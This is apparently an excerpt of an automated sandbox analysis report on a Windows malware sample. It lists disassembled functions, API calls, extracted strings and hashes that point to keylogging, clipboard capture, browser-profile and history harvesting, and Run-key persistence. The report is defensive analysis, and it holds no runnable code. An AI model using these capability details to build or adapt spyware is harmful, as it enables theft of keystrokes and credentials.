                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                                  • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                                                                  • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                                  • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                                                                  Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                                                                    • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                  • String ID:
                                                                                  • API String ID: 1761009282-0
                                                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                  • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                  • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                                                                  Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 3213639722-2276729525
                                                                                  • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                                  • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                                                                  • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                                  • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                                                                  Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                                                                  Strings
                                                                                  • /sort "Visit Time" /stext ", xrefs: 00404092
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                  • String ID: /sort "Visit Time" /stext "
                                                                                  • API String ID: 368326130-1573945896
                                                                                  • Opcode ID: d6066f6fedcf8ee7e641328f055e00c8f98f2a4b7a6ad40c7887a3f4e34f155a
                                                                                  • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                                                                  • Opcode Fuzzy Hash: d6066f6fedcf8ee7e641328f055e00c8f98f2a4b7a6ad40c7887a3f4e34f155a
                                                                                  • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                                                                  Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                  • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Init_thread_footer__onexit
                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                  • API String ID: 1881088180-3686566968
                                                                                  • Opcode ID: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
                                                                                  • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                                                                  • Opcode Fuzzy Hash: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
                                                                                  • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                                                                  Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 0-711371036
                                                                                  • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                                  • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                                                                  • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                                  • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                                                                  Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                                                                  • IsWindowVisible.USER32(?), ref: 00415B37
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$TextVisible
                                                                                  • String ID: (%G
                                                                                  • API String ID: 1670992164-3377777310
                                                                                  • Opcode ID: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
                                                                                  • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                                                                  • Opcode Fuzzy Hash: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
                                                                                  • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                                                                  Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                                                                  Strings
                                                                                  • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                  • API String ID: 481472006-507513762
                                                                                  • Opcode ID: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
                                                                                  • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                                                                  • Opcode Fuzzy Hash: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
                                                                                  • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                                                                  Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                                                                  • ___raise_securityfailure.LIBCMT ref: 00432E76
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                  • String ID: (F
                                                                                  • API String ID: 3761405300-3109638091
                                                                                  • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                                                                  • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                                                                  • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                                                                  • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                                                                  Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                  • API String ID: 481472006-2430845779
                                                                                  • Opcode ID: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
                                                                                  • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                                                                  • Opcode Fuzzy Hash: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
                                                                                  • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                                                                  Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: alarm.wav$x(G
                                                                                  • API String ID: 1174141254-2413638199
                                                                                  • Opcode ID: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
                                                                                  • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                                                                  • Opcode Fuzzy Hash: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
                                                                                  • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                                                                  Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • CloseHandle.KERNEL32(?), ref: 00409FFD
                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040A010
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                  • String ID: Online Keylogger Stopped
                                                                                  • API String ID: 1623830855-1496645233
                                                                                  • Opcode ID: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
                                                                                  • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                                                                  • Opcode Fuzzy Hash: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
                                                                                  • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                                                                  Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                  • API String ID: 1174141254-2800177040
                                                                                  • Opcode ID: f72588871a47a103f08bd557687f8b84f797b2eb235cb9e389d344094cad4272
                                                                                  • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                                                                  • Opcode Fuzzy Hash: f72588871a47a103f08bd557687f8b84f797b2eb235cb9e389d344094cad4272
                                                                                  • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                                                                  Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                  • API String ID: 1174141254-4188645398
                                                                                  • Opcode ID: 4c5869dc73605c4198742c87f314f8ffe11a8100b16f69da5b982344c5d6b7fa
                                                                                  • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                                                                  • Opcode Fuzzy Hash: 4c5869dc73605c4198742c87f314f8ffe11a8100b16f69da5b982344c5d6b7fa
                                                                                  • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                                                                  Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                                  • API String ID: 1174141254-1629609700
                                                                                  • Opcode ID: 0cb57bc748a43cdf280c296903742492f5481ab6d2799d92af52763c0172cfec
                                                                                  • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                                                                  • Opcode Fuzzy Hash: 0cb57bc748a43cdf280c296903742492f5481ab6d2799d92af52763c0172cfec
                                                                                  • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                                                                  Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyState.USER32(00000011), ref: 0040A597
                                                                                    • Part of subcall function 00409468: GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                                                                    • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                    • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                    • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                                                                    • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                                                                    • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                                  • String ID: [AltL]$[AltR]
                                                                                  • API String ID: 3195419117-2658077756
                                                                                  • Opcode ID: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
                                                                                  • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                                                                  • Opcode Fuzzy Hash: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
                                                                                  • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                                                                  Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyState.USER32(00000012), ref: 0040A5F1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: State
                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                  • API String ID: 1649606143-2446555240
                                                                                  • Opcode ID: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
                                                                                  • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                                                                  • Opcode Fuzzy Hash: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
                                                                                  • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                                                                  Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,004721E8,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,004721E8), ref: 00412422
                                                                                  • RegDeleteValueW.ADVAPI32(004721E8,?,?,00472200,pth_unenc,004721E8), ref: 00412436
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteOpenValue
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                  • API String ID: 2654517830-1051519024
                                                                                  • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                                                                  • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                                                                  • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                                                                  • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                                                                  Function 00433058 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064
                                                                                    • Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433072
                                                                                    • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                  • String ID: P@
                                                                                  • API String ID: 1586462112-676759640
                                                                                  • Opcode ID: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                                                                  • Instruction ID: 0bfe0c8ac6dbc9b0d4453f7df384559b02cf33d5589a4338b6e2a72978291aeb
                                                                                  • Opcode Fuzzy Hash: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                                                                  • Instruction Fuzzy Hash: 5CC08034C0020C77CB00F6E1C907C8D773C5D04300F405416B51091081E774531D96D5
                                                                                  Function 00433038 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044
                                                                                    • Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433052
                                                                                    • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                  • String ID: P@
                                                                                  • API String ID: 1586462112-676759640
                                                                                  • Opcode ID: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                                                                  • Instruction ID: 865ee2ddef0a897f612f6fb2ad11127a6c44acc13293d016e759f8d59b40e8c3
                                                                                  • Opcode Fuzzy Hash: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                                                                  • Instruction Fuzzy Hash: 15C08034C0010CB7CB00FAF5D907D8E773C5904340F409015B61091041E7B8631C87C5
                                                                                  Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                                                                  • GetLastError.KERNEL32 ref: 0043B4E9
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1717984340-0
                                                                                  • Opcode ID: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
